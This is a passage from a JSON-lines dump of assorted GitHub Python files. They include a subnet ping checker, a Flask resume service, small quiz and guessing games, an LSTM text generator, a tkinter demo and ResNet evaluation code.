read_obj[class_name].append((var_type, var_name))\n return read_obj\n\n\ndef write_classes(write_file, all_expr_class_infos, base_class_name):\n for expr_class_name, expr_class_fields in all_expr_class_infos.items():\n # Set-up for class\n write_file.write(\"class {0}({1}):\\n\".format(expr_class_name, base_class_name))\n write_file.write(\"{0}def __init__({1}):\\n\".format(\n indent, ', '.join(\n ['self'] + [var_name for var_type, var_name in expr_class_fields])))\n\n # Writing fields of __init__()\n for field in expr_class_fields:\n (var_type, var_name) = field\n write_file.write(\"{0}self.{1} = {2} # type: {3}\\n\".format(\n indent * 2, var_name, var_name, var_type)) \n write_file.write('\\n')\n\n\nbase_expression_class_name = 'Expression'\nexpression_grammar_definition = [\n 'Assignment : Token name, Expr right',\n 'Binary : Expr left, Token operator, Expr right',\n 'Grouping : Expr expression',\n 'Call : Expr callee, Token paren, List arguments',\n 'Literal : Object value',\n 'Unary : Token 
operator, Expr right',\n 'Variable : Token token_obj',\n]\nexpression_grammar = (base_expression_class_name, expression_grammar_definition)\n\n\nbase_statement_class_name = 'Statement'\nstatement_grammar_definition = [\n 'Block : List statements',\n 'Expression : Expr expression',\n 'Function : Token token_obj, List param_token_objs, List body',\n 'If : Expr condition, Statement then_branch, Statement else_branch',\n 'Print : Expr expression',\n 'Return : Expr expression',\n 'Var : Token token_obj, Expr initializer',\n 'While : Expr condition, Statement then_branch',\n]\nstatement_grammar = (base_statement_class_name, statement_grammar_definition)\n\n\nall_grammars = [expression_grammar, statement_grammar]\nfor base_class_name, grammar_definition in all_grammars:\n # setup stuff for grammar\n grammer_class_filename_write = '{0}_output.py'.format(base_class_name.lower())\n indent = ' ' * 4\n base_visitor_class_name = 'Visitor'\n visitor_types = [\n 'Evaluate{0}'.format(base_class_name), \n 'Stringify{0}'.format(base_class_name), \n # 'Stringify{0}RPN'.format(base_class_name)\n ]\n # writing the actual class\n with open(grammer_class_filename_write, 'w') as write_file:\n all_expr_class_infos = {}\n for line in grammar_definition:\n expr_class_info = read_line_from_grammar(write_file, line)\n if expr_class_info:\n all_expr_class_infos.update(expr_class_info)\n print(all_expr_class_infos)\n if 'END GRAMMAR' in line:\n break\n\n # header\n write_header_info(write_file, all_expr_class_infos, base_class_name)\n \n # writing expr info\n write_base_class(write_file, base_class_name)\n\n # writing expr info\n write_classes(write_file, all_expr_class_infos, base_class_name)\n\n # visitor info\n write_visitor_info(write_file, all_expr_class_infos)\n\n # reads file, strips all trailing newlines and stores in temp string\n with open(grammer_class_filename_write, 'r') as write_file:\n new_str = write_file.read().rstrip('\\n')\n\n # overwrites file with tempstring\n with open(grammer_class_filename_write, 'w') as write_file:\n write_file.write(new_str)\n\n print('Created \"{0}\" file using {1} grammar'.format(\n grammer_class_filename_write, grammar_definition))","repo_name":"aduerig/JLox","sub_path":"Tool_CreateGrammarClasses.py","file_name":"Tool_CreateGrammarClasses.py","file_ext":"py","file_size_in_byte":5822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16063600601","text":"\"\"\"mpts - Multithreaded Ping Two Subnets (designed for two CIDR/24 subnets)\n\nThis script concurrently pings (in multithreaded mode) two separate CIDR/24\nsubnets (called CIDR1/24 and CIDR2/24) and outputs:\n 1. All ping results\n 2. If all success:\n \"Both CIDR1/24 and CIDR2/24 are fully responding to ping requests.\n No failures.\"\n 3. If any failures:\n a. IP addresses in CIDR1/24 that failed ping\n b. IP addresses in CIDR2/24 that failed ping\n c. Final octets of failed ping requests in CIDR1/24 but not CIDR2/24\n d. Final octets of failed ping requests in CIDR2/24 but not CIDR1/24\n e. 
Final octets of failed ping requests in both CIDR1/24 and CIDR2/24\n\"\"\"\n\nfrom subprocess import Popen\nfrom subprocess import PIPE\nfrom threading import Thread\nimport ipaddress\nimport queue\nimport sys\nimport getopt\n\n\ndef initiate_ping_queues(cidr1, cidr2, skip):\n \"\"\"Initiates the multithreaded ping queues\n\n Parameters\n ----------\n cidr1 : str\n The CIDR1/24 subnet (e.g., \"192.168.1.0/24\")\n cidr2 : str\n The CIDR2/24 subnet (e.g., \"192.168.2.0/24\")\n skip : str\n A skipped octet, if any\n\n Returns\n -------\n result : list\n \"\"\"\n num_threads = 20\n ips_q1, ips_q2 = queue.Queue(), queue.Queue()\n ips1, ips2 = [], []\n failed_ips1, failed_ips2 = [], []\n\n for ip in ipaddress.IPv4Network(cidr1):\n ip_str = str(ip)\n octets = ip_str.split(\".\")\n final_octet = int(octets[3])\n if final_octet == 0 or final_octet == skip:\n continue # disregard 0 (broadcast) octet or skipped octet\n ips1.append((final_octet, ip_str))\n\n for ip in ipaddress.IPv4Network(cidr2):\n ip_str = str(ip)\n octets = ip_str.split(\".\")\n final_octet = int(octets[3])\n if final_octet == 0 or final_octet == skip:\n continue # disregard 0 (broadcast) octet or skipped octet\n ips2.append((final_octet, ip_str))\n\n # start the queue1 thread pool\n for i in range(num_threads):\n worker = Thread(target=ping_thread, args=(i, ips_q1, failed_ips1))\n worker.setDaemon(True)\n worker.start()\n\n # fill queue1\n for ip in ips1:\n ips_q1.put(ip)\n\n # start the queue2 thread pool\n for i in range(num_threads):\n worker = Thread(target=ping_thread, args=(i, ips_q2, failed_ips2))\n worker.setDaemon(True)\n worker.start()\n\n # fill queue2\n for ip in ips2:\n ips_q2.put(ip)\n\n # wait until queue1 worker threads are done to exit\n ips_q1.join()\n\n # wait until queue2 worker threads are done to exit\n ips_q2.join()\n\n result = print_results(cidr1, failed_ips1, cidr2, failed_ips2)\n return result\n\n\ndef ping_thread(i, q, faillist):\n \"\"\"Single ping thread\n\n Parameters\n ----------\n i : int\n thread id\n q : queue.Queue()\n multithreaded ping queue\n faillist : list\n List containing tuples of failed CIDR/24 IP addresses.\n Each tuple contains the final octet and the IP address.\n\n Returns\n -------\n None.\n \"\"\"\n while True:\n ip = q.get()\n attempt = 1\n while attempt < 4:\n with Popen(['ping', '-c', '1', '-W', '1', ip[1]], stdout=PIPE) \\\n as response:\n result = response.wait()\n # print the ping output if desired\n # print(response.communicate()[0])\n return_code = get_returncode(ip, response)\n if return_code == 0:\n print(ip[1], 'is up')\n break\n elif return_code != 0 and attempt == 3:\n print(ip[1], 'is down')\n faillist.append(ip)\n break\n else:\n print(ip[1], f\"failed ping - attempt {attempt}\")\n attempt += 1\n q.task_done()\n\n\ndef get_returncode(ip, response):\n \"\"\"Returns the returncode of the ping request.\n Deliberately extracted into function to allow mock of ping request\n \"\"\"\n return response.returncode\n\n\ndef print_results(cidr1, failed_ips1, cidr2, failed_ips2):\n \"\"\"Displays the results of the multithreaded ping queues\n\n Parameters\n ----------\n cidr1 : str\n The first subnet (CIDR1/24)\n cidr2 : str\n The second subnet (CIDR2/24)\n failed_ips1 : list\n List containing tuples of failed CIDR1/24 IP addresses.\n Each tuple contains the final octet and the IP address.\n failed_ips2 : list\n List containing tuples of failed CIDR2/24 IP addresses.\n Each tuple contains the final octet and the IP address.\n\n Returns\n -------\n failed_ips1 : list\n List 
containing tuples of failed CIDR1/24 IP addresses.\n Each tuple contains the final octet and the IP address.\n failed_ips2 : list\n List containing tuples of failed CIDR2/24 IP addresses.\n Each tuple contains the final octet and the IP address.\n failed_ips1_excl_octets : list\n List containing final octets of pings that failed CIDR1/24 (only).\n failed_ips2_excl_octets : list\n List containing final octets of pings that failed CIDR2/24 (only).\n failed_ips_common_octets : list\n List containing final octets of pings that failed CIDR1/24\n and CIDR2/24 (both).\n \"\"\"\n failed_ips1_octets = [item[0] for item in failed_ips1]\n failed_ips2_octets = [item[0] for item in failed_ips2]\n failed_ips1_addrs = [item[1] for item in failed_ips1]\n failed_ips2_addrs = [item[1] for item in failed_ips2]\n\n failed_ips1_excl_octets, failed_ips_common_octets = [], []\n for octet in failed_ips1_octets:\n if octet not in failed_ips2_octets:\n failed_ips1_excl_octets.append(octet)\n else:\n failed_ips_common_octets.append(octet)\n\n failed_ips2_excl_octets = []\n for octet in failed_ips2_octets:\n if octet not in failed_ips1_octets:\n failed_ips2_excl_octets.append(octet)\n\n failed_ips1_excl_octets.sort()\n failed_ips2_excl_octets.sort()\n failed_ips_common_octets.sort()\n\n if not failed_ips1 and not failed_ips2:\n print(f\"Both {cidr1} and {cidr2} are fully responding to ping \"\n f\"requests. No failures.\")\n else:\n print(f\"Failed ping requests in {cidr1}: \", failed_ips1_addrs)\n print(f\"Failed ping requests in {cidr2}: \", failed_ips2_addrs)\n print(f\"Final octets of failed ping requests in {cidr1}, but not \"\n f\"{cidr2}: \", failed_ips1_excl_octets)\n print(f\"Final octets of failed ping requests in {cidr2}, but not \"\n f\"{cidr1}: \", failed_ips2_excl_octets)\n print(f\"Final octets of failed ping requests in both {cidr1} and \"\n f\"{cidr2}: \", failed_ips_common_octets)\n return (failed_ips1, failed_ips2, failed_ips1_excl_octets,\n failed_ips2_excl_octets, failed_ips_common_octets)\n\n\ndef main(argv):\n \"\"\"Main method which takes arguments from the command line\n Available command line arguments include:\n --cidr1 Allows specification of custom CIDR1/24 subnet\n --cidr2 Allows specification of custom CIDR2/24 subnet\n --skip Allows specification of octet to be excluded from\n ping test\n\n Returns\n -------\n result : list\n \"\"\"\n cidr1 = \"192.168.1.0/24\"\n cidr2 = \"192.168.2.0/24\"\n skip = \"\"\n try:\n opts, args = getopt.getopt(argv, \"h\", [\"cidr1=\", \"cidr2=\", \"skip=\"])\n except getopt.GetoptError:\n print(\"usage: python3 mpts.py --cidr1 --cidr2 \"\n \"--skip \")\n sys.exit(2)\n for opt, arg in opts:\n if opt == '-h':\n print(\"help: python3 mpts.py --cidr1 --cidr2 \"\n \" --skip \")\n sys.exit()\n if opt in (\"--cidr1\"):\n cidr1 = arg\n if cidr1[-3:] != \"/24\":\n print(\"--cidr1 and --cidr2 accept CIDR/24 subnets only.\")\n sys.exit()\n elif opt in (\"--cidr2\"):\n cidr2 = arg\n if cidr2[-3:] != \"/24\":\n print(\"--cidr1 and --cidr2 accept CIDR/24 subnets only.\")\n sys.exit()\n elif opt in (\"--skip\"):\n skip = arg\n try:\n skip = int(skip)\n assert 0 <= skip <= 255\n except ValueError or AssertionError:\n print(\"--skip must have a valid octet value (0 <= \"\n \"octet <= 255)\")\n sys.exit()\n else:\n assert False, \"unhandled option\"\n\n print(\"\")\n print(\"CIDR1: \", cidr1)\n print(\"CIDR2: \", cidr2)\n result = initiate_ping_queues(cidr1, cidr2, skip)\n return result\n\n\nif __name__ == \"__main__\":\n 
main(sys.argv[1:])\n","repo_name":"aethereal7i/mpts","sub_path":"mpts.py","file_name":"mpts.py","file_ext":"py","file_size_in_byte":8901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37725439052","text":"from pyNN import common\nfrom pyNN import __version__\n\nimport logging\n\nname = \"NeuroML2Converter\"\n\nimport neuroml\nimport pyneuroml\nfrom pyneuroml.lems.LEMSSimulation import LEMSSimulation\n\nnml_doc = None\nlems_sim = None\n\nlogger = logging.getLogger(\"PyNN_NeuroML\")\n\ncomment = \"\\n This %s file has been generated from: \\n\" + \\\n \" PyNN v%s\\n\"%__version__ + \\\n \" libNeuroML v%s\\n\"%neuroml.__version__ + \\\n \" pyNeuroML v%s\\n \"%pyneuroml.__version__\n\n\ndef _get_nml_doc(reference=\"PyNN_NeuroML2_Export\",reset=False):\n \"\"\"Return the main NeuroMLDocument object being created\"\"\"\n global nml_doc\n global comment\n if nml_doc == None or reset:\n nml_doc = neuroml.NeuroMLDocument(id=reference)\n nml_doc.notes = comment%'NeuroML 2'\n\n return nml_doc\n\n\ndef _get_main_network():\n \"\"\"Return the main NeuroML network object being created\"\"\"\n return _get_nml_doc().networks[0]\n\ndef _get_lems_sim(reference=None,reset=False):\n \"\"\"Return the main LEMSSimulation object being created\"\"\"\n global lems_sim\n global comment\n if reference == None:\n reference = _get_nml_doc().id\n if lems_sim == None or reset:\n # Note: values will be over written\n lems_sim = LEMSSimulation(\"Sim_%s\"%reference, 100, 0.01, target=reference,comment=comment%'LEMS')\n return lems_sim\n\nclass ID(int, common.IDMixin):\n def __init__(self, n):\n \"\"\"Create an ID object with numerical value `n`.\"\"\"\n int.__init__(n)\n common.IDMixin.__init__(self)\n\nclass State(common.control.BaseState):\n def __init__(self):\n logger.debug(\"State initialised!\")\n common.control.BaseState.__init__(self)\n self.mpi_rank = 0\n self.num_processes = 1\n self.clear()\n self.dt = 0.1\n def run(self, simtime):\n self.t += simtime\n self.running = True\n def run_until(self, tstop):\n logger.debug(\"run_until() called with %s\"%tstop)\n lems_sim = _get_lems_sim()\n lems_sim.duration = float(tstop)\n\n self.t = tstop\n self.running = True\n def clear(self):\n self.recorders = set([])\n self.id_counter = 42\n self.segment_counter = -1\n self.reset()\n def reset(self):\n \"\"\"Reset the state of the current network to time t = 0.\"\"\"\n self.running = False\n self.t = 0\n self.t_start = 0\n self.segment_counter += 1\n\nstate = State()\n","repo_name":"NeuralEnsemble/PyNN","sub_path":"pyNN/neuroml/simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":2448,"program_lang":"python","lang":"en","doc_type":"code","stars":256,"dataset":"github-code","pt":"78"} +{"seq_id":"30495421082","text":"from app.dao.resume_dao import *\nimport jwt\nfrom app.app import app\n\n# 添加基本简历\ndef check_addbase(requst):\n token = requst.headers['token']\n decoded = jwt.decode(token, app.config['SECRET_KEY'], audience='webkit', algorithms=['HS256'])\n user_id=decoded['user_id']\n title=requst.values['title']\n name=requst.values['name']\n birth=requst.values['birth']\n base_resume={\n \"title\":title,\n \"name\":name,\n \"birth\":birth,\n \"user_id\":user_id\n }\n res=addResumeBase(base_resume)\n return res\n\n# 添加工作简历\ndef check_addjob(requst):\n cname=requst.values['cname']\n pname=requst.values['pname']\n basic_id=requst.values['resume_basic_id']\n resume_job={\n \"cname\":cname,\n \"pname\":pname,\n \"resume_basic_id\":basic_id\n }\n 
res=addResumejob(resume_job)\n return res\n\n# 添加教育简历\ndef check_addedu(requst):\n school=requst.values['school']\n basic_id=requst.values['resume_basic_id']\n resume_edu={\n \"school\":school,\n \"resume_basic_id\":basic_id\n }\n res=addResumejob(resume_edu)\n return res\n\n#更新完善简历\ndef check_updata(requst):\n table=requst.values['table']\n term=requst.values['term']\n new=requst.values['new']\n id=requst.values['id']\n resume_updata = {\n \"table\": table,\n \"term\": term,\n \"new\": new,\n \"id\": id\n }\n res=updataResume(resume_updata)\n return res\n\n#查找简历信息\ndef check_search(requst):\n id=requst.values['tel']\n res=searchResume(id)\n return res\n\n#删除简历信息\ndef check_delete(requst):\n token = requst.headers['token']\n decoded = jwt.decode(token, app.config['SECRET_KEY'], audience='webkit', algorithms=['HS256'])\n id=decoded['user_id']\n res=deleteResume(id)\n return res\n\n#查找简历信息\ndef check_searchResumeBasic(id):\n res=searchResumeBasic(id)\n if len(res):\n for i in range(len(res)):\n jobs=searchResumeJob(res[i]['resume_id'])\n edus = searchResumeEdu(res[i]['resume_id'])\n res[i]['jobs']=jobs\n res[i]['edus']=edus\n return res\n\n\n","repo_name":"Stobadiouth/python-","sub_path":"flask-project/app/service/resume_service.py","file_name":"resume_service.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32904533970","text":"# MQ component 5 - ask user if they want to allow negatives in subtraction equations\n\nimport random\n\n\n# Function to check if the user entered a valid answer (text)\ndef choice_checker(question, valid_list, error):\n valid = False\n while not valid:\n\n # Ask user for choice (and put in lowercase)\n response = input(question).lower()\n\n # iterates through list and if response is an item\n # in the list (or the first letter of an item), the\n # full item name is returned\n\n for item in valid_list:\n if response == item[0] or response == item:\n return item\n\n else:\n print(error)\n\n\nstatement = \"subtraction\"\nlowest = 1\nhighest = 10\n\n# valid lists\nyes_no_list = [\"yes\", \"no\"]\n\nallow_negative = choice_checker(\"Do you want negatives in subtraction questions? 
\", yes_no_list, \"Please enter yes or no \")\n\nfor item in range(1, 10):\n\n # variable to choose between correct and incorrect answers (1 = correct, 2 = incorrect)\n chosen_num = random.randint(1,2)\n\n # generates two random numbers between lowest and highest\n if statement == \"subtraction\" and allow_negative == \"yes\":\n num_1 = random.randint(lowest, highest)\n num_2 = random.randint(lowest, highest)\n\n if chosen_num == 1:\n\n answer = int(num_1 - num_2)\n\n else:\n\n answer = random.randint(lowest, highest)\n \n elif statement == \"subtraction\" and allow_negative == \"no\":\n num_2 = random.randint(lowest, highest)\n num_1 = random.randint(num_2, highest)\n\n if chosen_num == 1:\n\n answer = int(num_1 - num_2)\n \n else:\n\n answer = random.randint(lowest, highest)\n\n question = \"{} - {} = {}\".format(num_1, num_2, answer)\n\n print(question)\n","repo_name":"Jack-Sh/04_Math_Quiz","sub_path":"05_allow_negative.py","file_name":"05_allow_negative.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"34470350818","text":"import random\nimport sys\n\n\ndef jogar():\n\n print(\"**********************************\")\n print(\"*bem vindo ao jogo de adivinhação*\")\n print(\"**********************************\")\n\n\n numero_secreto = random.randrange(0,101)\n total_tentativas = 3\n rodada = 1\n pontos = 1000\n\n print(\"Qual nível de dificuldade?\")\n print(\"(1) - Fácil | (2) - Médio | (3) - Difícil\")\n\n nivel = int(input(\"Define o nível\"))\n\n if (nivel == 1):\n total_tentativas = 20\n elif (nivel == 2):\n total_tentativas = 10\n elif (nivel == 3):\n total_tentativas = 5\n else:\n print(\"Opção incorreta.\")\n sys.exit()\n\n\n\n # função format()\n # print(\"R$ {:07.2f}\".format(1.38))\n\n\n # while - início\n # while(rodada <= total_tentativas):\n for rodada in range(1, total_tentativas + 1):\n print(\"Tentativa {0} de {1} \".format(rodada,total_tentativas))\n chute = input(\"Digite um número entre 1 e 100: \\n\")\n chute = int(chute)\n\n if (chute < 1 or chute > 100):\n print(\"Número fora da área de tentativas\")\n continue\n\n print(\"Você digitou \", chute)\n\n if(numero_secreto == chute):\n print(\"Você acertou e fez {}\".format(pontos))\n break\n else: \n if(chute > numero_secreto):\n print(\"Você errou, o seu chute foi maior que o número secreto\")\n elif(chute < numero_secreto):\n print(\"Você errou, o seu chute foi menor que o número secreto\")\n \n pontos_perdidos = abs(numero_secreto - chute)\n pontos = pontos - pontos_perdidos\n\n print(\"Fim de jogo\")\n \n # while - fim\n\nif(__name__ == \"__main__\"):\n jogar()","repo_name":"marcosfabrejunior/iniciando-python","sub_path":"jogos/adivinhacao.py","file_name":"adivinhacao.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"34103114620","text":"import numpy as np\r\nimport pandas as pd\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\nfrom keras.layers import Dropout\r\nfrom keras.layers import LSTM\r\nfrom keras.utils import np_utils\r\n\r\n\r\n''' =========== Input Layer ============== '''\r\ntext=(open(\"sonnet.txt\").read())\r\ntext=text.lower()\r\ncharacters = sorted(list(set(text)))\r\nn_to_char = {n:char for n, char in enumerate(characters)}\r\nchar_to_n = {char:n for n, char in enumerate(characters)}\r\n\r\n''' ============== Input Layer =============== '''\r\n\r\n''' ============= 
Data Pre-processing ========== '''\r\nX = [] #Training Array\r\nY = [] #Taregt Array\r\nlength = len(text)\r\nseq_length = 100 #length of the sequence of characters that we want to consider before predicting a particular character.\r\n\r\nfor i in range(0, length-seq_length, 1):\r\n sequence = text[i:i + seq_length]\r\n label =text[i + seq_length]\r\n X.append([char_to_n[char] for char in sequence])\r\n Y.append(char_to_n[label])\r\n \r\n'''\r\nLSTMs accept input in the form of \r\n(number_of_sequences, length_of_sequence, number_of_features) which is not the current format of the arrays. \r\nAlso, we need to transform the array Y into a one-hot encoded format.\r\n'''\r\n\r\nX_modified = np.reshape(X, (len(X), seq_length, 1))\r\nX_modified = X_modified / float(len(characters))\r\nY_modified = np_utils.to_categorical(Y)\r\n\r\n''' ============= Data Pre-processing ========== '''\r\n\r\n''' ============= Modelling ========== '''\r\n\r\nmodel = Sequential()\r\nmodel.add(LSTM(400, input_shape=(X_modified.shape[1], X_modified.shape[2]), return_sequences=True))\r\nmodel.add(Dropout(0.2))\r\nmodel.add(LSTM(400))\r\nmodel.add(Dropout(0.2))\r\nmodel.add(Dense(Y_modified.shape[1], activation='softmax'))\r\nmodel.compile(loss='categorical_crossentropy', optimizer='adam')\r\n\r\n''' ============= Modelling ========== '''\r\n\r\n''' ============= Model.Fit ========== '''\r\nmodel.fit(X_modified, Y_modified, epochs=1, batch_size=100)\r\nmodel.save_weights('models/baseline_model.h5')\r\n\r\n\r\n''' ============= Model.Fit ========== '''\r\n\r\n\r\n\r\n''' ============= Generating Text ========== '''\r\n\r\nstring_mapped = X[99]\r\n# generating characters\r\nfor i in range(seq_length):\r\n x = np.reshape(string_mapped,(1,len(string_mapped), 1))\r\n x = x / float(len(characters))\r\n pred_index = np.argmax(model.predict(x, verbose=0))\r\n seq = [n_to_char[value] for value in string_mapped]\r\n string_mapped.append(pred_index)\r\n string_mapped = string_mapped[1:len(string_mapped)]\r\n \r\n''' ============= Generating Text ========== '''\r\n\r\n\r\n''' ============= Combining Text ========== '''\r\n#combining text\r\ntxt=\"\"\r\nfor char in full_string:\r\n txt = txt+char\r\ntxt\r\n''' ============= Combining Text ========== '''","repo_name":"adib0073/MUST_AI_Research","sub_path":"NLP/Text_Generation/LSTM/Text_Generator.py","file_name":"Text_Generator.py","file_ext":"py","file_size_in_byte":2701,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"10390261594","text":"import tkinter as tk\r\n#f\r\nfrom tkinter import Checkbutton,Button\r\nwin = tk.Tk()\r\n# win.title('按钮测试')\r\n# win.geometry('300x300')\r\n#\r\n#\r\n# def handler(num):\r\n# print(\"传过来的数字是:\", num)\r\n#\r\n#\r\n# for i in range(5):\r\n# btn = tk.Button(win, text=\"按钮\" + str(i), command=lambda num=i: handler(num))\r\n# btn.pack()\r\n# win.mainloop()\r\n# i = 99\r\nList_Int=[tk.BooleanVar() for _ in range(5)]\r\nprint([id(i) for i in List_Int])\r\nCheckbutton1=Checkbutton(win,text=\"A\",variable=List_Int[0])\r\nCheckbutton1.grid(row=1,column=1)\r\nCheckbutton2 = Checkbutton(win, text=\"B\",variable=List_Int[1])\r\nCheckbutton2.grid(row=1, column=2)\r\nCheckbutton3 = Checkbutton(win, text=\"C\",variable=List_Int[2])\r\nCheckbutton3.grid(row=2, column=1)\r\nCheckbutton4 = Checkbutton(win, text=\"D\",variable=List_Int[3])\r\nCheckbutton4.grid(row=2, column=2)\r\nCheckbutton5=Checkbutton(win,text='E',variable=List_Int[4])\r\nCheckbutton5.grid(row=3,column=1)\r\n\r\n\r\ndef Chcek():\r\n 
print([x.get() for x in List_Int])\r\n\r\n\r\n\r\nButton1 = Button(win, text='确定', command=Chcek);\r\nButton1.grid(row=3, column=2)\r\nwin.mainloop()","repo_name":"1nancy23/Train-ticket-management-system","sub_path":"choosebox.py","file_name":"choosebox.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"24280001445","text":"from datetime import date\r\ntrabalhador = {}\r\nano = date.today().year\r\n\r\ntrabalhador['nome'] =str(input('Nome:'))\r\ntrabalhador['sexo'] = str(input('Sexo:')).strip().upper()[0]\r\ntrabalhador['ano'] = int(input('Ano de nascimento:'))\r\ntrabalhador['clt'] = int(input('Número da carteira (0 não tem):'))\r\nif trabalhador['clt'] == 0:\r\n print('-='*30)\r\n for k,v in trabalhador.items():\r\n print(f' -{k} tem o valor de {v}.')\r\nelse:\r\n trabalhador['ac'] = int(input('Ano que foi contratado:'))\r\n trabalhador['salario'] = float(input('Salário:'))\r\n if trabalhador['sexo'] in 'M':\r\n trabalhador['aposentadoria'] = 66 - ( ano - trabalhador['ac'])\r\n else:\r\n trabalhador['aposentadoria'] = 60 - (ano - trabalhador['ac'])\r\n print('-='*30)\r\n for k,v in trabalhador.items():\r\n print(f' -{k}tem valor de {v}.')","repo_name":"DongoDudongo/exerciciospython","sub_path":"ex102.py","file_name":"ex102.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"33949321943","text":"import torch\nimport warnings\n\nimport torch.nn as nn\nimport torch.optim as optim\nimport utils as utility\n\nimport torchvision.transforms as torch_transforms\nimport dataloaders.standford_online_products as sop\nimport nets.resnet as resnet\nimport losses as losses\n\ndef _main(args):\n warnings.filterwarnings(\"ignore\") \n\n #### Constructing Criterion ####\n # criterion = losses.TripletLoss(1.)\n bin_size = 10\n start_bin, end_bin = (0., 4.)\n criterion = losses.FastAP(bin_size, start_bin, end_bin)\n # criterion = losses.TripletLoss(1.)\n \n #### Preparing Test Dataset ####\n test_data_root = './datasets/standford_online_products/test'\n test_data_transform = torch_transforms.Resize((225,225))\n test_num_retrieval_per_class = 10\n test_pos_neighbor, test_neg_neighbor = (True, True) if type(criterion) in [losses.TripletLoss] else (False, False)\n test_dataloader = sop.loader( test_data_root, \\\n data_transform=test_data_transform, \\\n eval_mode=True, \\\n eval_num_retrieval=test_num_retrieval_per_class, \\\n neg_neighbor=test_neg_neighbor, \\\n pos_neighbor=test_pos_neighbor\n )\n\n #### Preparing Validation Dataset ####\n val_data_root = './datasets/standford_online_products/val'\n val_num_retrieval_per_class = test_num_retrieval_per_class\n val_data_transform = torch_transforms.Resize((225,225))\n val_pos_neighbor, val_neg_neighbor = (True, True) if type(criterion) in [losses.TripletLoss] else (False, False)\n val_dataloader = sop.loader(val_data_root, \\\n data_transform=val_data_transform, \\\n eval_mode=True, \\\n eval_num_retrieval=val_num_retrieval_per_class,\\\n neg_neighbor=val_neg_neighbor, \\\n pos_neighbor=val_pos_neighbor\n )\n\n #### Preparing Pytorch ####\n device = args.device\n assert (device in ['cpu', 'multi']) or ( len(device.split(':'))==2 and device.split(':')[0]=='cuda' and int(device.split(':')[1]) < torch.cuda.device_count() ), 'Uknown device: {}'.format( device )\n torch.manual_seed(0)\n if args.device!='multi':\n device = torch.device(args.device)\n if 
args.gpu and torch.cuda.is_available():\n torch.cuda.manual_seed_all(0)\n\n #### Training Parameters ####\n start_epoch, num_epoch = (args.start_epoch, args.epochs)\n batch_size = args.batch_size\n num_workers = args.num_workers\n check_counter = 10\n\n #### Reports Address ####\n reports_root = './reports'\n analysis_num = args.analysis\n reports_path = '{}/{}'.format( reports_root, analysis_num)\n loading_model_path = '{}/models'.format( reports_path )\n\n #### Constructing Model ####\n pretrained = args.pretrained and False\n num_classes = 512\n \n model = None\n if args.resnet_type=='resnet18':\n model = resnet.resnet18(pretrained=pretrained)\n elif args.resnet_type=='resnet34':\n model = resnet.resnet34(pretrained=pretrained)\n elif args.resnet_type=='resnet50':\n model = resnet.resnet50(pretrained=pretrained)\n elif args.resnet_type=='resnet101':\n model = resnet.resnet101(pretrained=pretrained)\n elif args.resnet_type=='resnet152':\n model = resnet.resnet152(pretrained=pretrained)\n # elif args.resnet_type=='resnext50_32x4d':\n # model = resnet.resnet18(pretrained=pretrained, num_classes=num_classes)\n # elif args.resnet_type=='resnext101_32x8d':\n # model = resnet.resnext101_32x8d(pretrained=pretrained, num_classes=num_classes)\n model.fc = nn.Linear(512 * 1, num_classes)\n \n #### Validation ####\n print('{} Validation {}'.format('#'*32, '#'*32))\n for epoch in range(start_epoch, start_epoch+num_epoch):\n print('{} epoch = {} {}'.format('='*32, epoch, '='*32))\n\n #### Constructing Optimizer ####\n optimizer = None\n if args.optimizer=='sgd':\n optimizer = optim.SGD(model.parameters(), lr=args.lr, momentum=args.momentum)\n elif args.optimizer=='adam':\n optimizer = optim.Adam(model.parameters(), lr=args.lr, weight_decay=args.weight_decay)\n \n #### Loading Model ####\n model, optimizer = resnet.load( loading_model_path,\n 'resnet_epoch_{}'.format( epoch ),\n model,\n optimizer=optimizer\n )\n\n if args.gpu and torch.cuda.is_available():\n if device=='multi':\n model = nn.DataParallel(model)\n else:\n model = model.cuda(device=device)\n\n resnet.eval(\n resnet=model,\n eval_data=val_dataloader,\n criterion=criterion,\n report_path=reports_path,\n epoch=epoch,\n device=device,\n batch_size=batch_size,\n num_workers=num_workers,\n check_counter=check_counter,\n gpu=args.gpu and torch.cuda.is_available(),\n eval_mode='val'\n )\n \n #### Testing ####\n print('{} Test {}'.format('#'*32, '#'*32))\n model, optimizer = resnet.load( loading_model_path,\n 'resnet_epoch_{}'.format( start_epoch+num_epoch-1 ),\n model,\n optimizer=optimizer\n )\n #### Constructing Optimizer ####\n optimizer = None\n if args.optimizer=='sgd':\n optimizer = optim.SGD(model.parameters(), lr=args.lr, momentum=args.momentum)\n elif args.optimizer=='adam':\n optimizer = optim.Adam(model.parameters(), lr=args.lr, weight_decay=args.weight_decay)\n\n if args.gpu and torch.cuda.is_available():\n if device=='multi':\n model = nn.DataParallel(model)\n else:\n model = model.cuda(device=device)\n \n resnet.eval(\n resnet=model,\n eval_data=test_dataloader,\n criterion=criterion,\n report_path=reports_path,\n epoch=start_epoch+num_epoch-1,\n device=device,\n batch_size=batch_size,\n num_workers=num_workers,\n check_counter=check_counter,\n gpu=args.gpu and torch.cuda.is_available(),\n eval_mode='test'\n )\n\nif __name__ == \"__main__\":\n args = utility.get_args()\n 
